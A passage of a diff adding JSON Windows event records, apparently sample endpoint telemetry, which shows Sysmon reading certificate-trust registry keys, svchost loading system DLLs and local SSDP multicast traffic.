"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "destination_address": "239.255.255.250", + "destination_port": "1900", + "event_type": "network", + "pid": 1156, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "127.0.0.1", + "source_port": "56578", + "subtype": "outgoing", + "timestamp": 131883570878990000, + "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "destination_address": "127.0.0.1", + "destination_port": "56578", + "event_type": "network", + "pid": 1156, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "239.255.255.250", + "source_port": "1900", + "subtype": "incoming", + "timestamp": 131883570879000000, + "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "usermgrcli.dll", + "image_path": "C:\\Windows\\System32\\usermgrcli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ExecModelClient.dll", + "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": 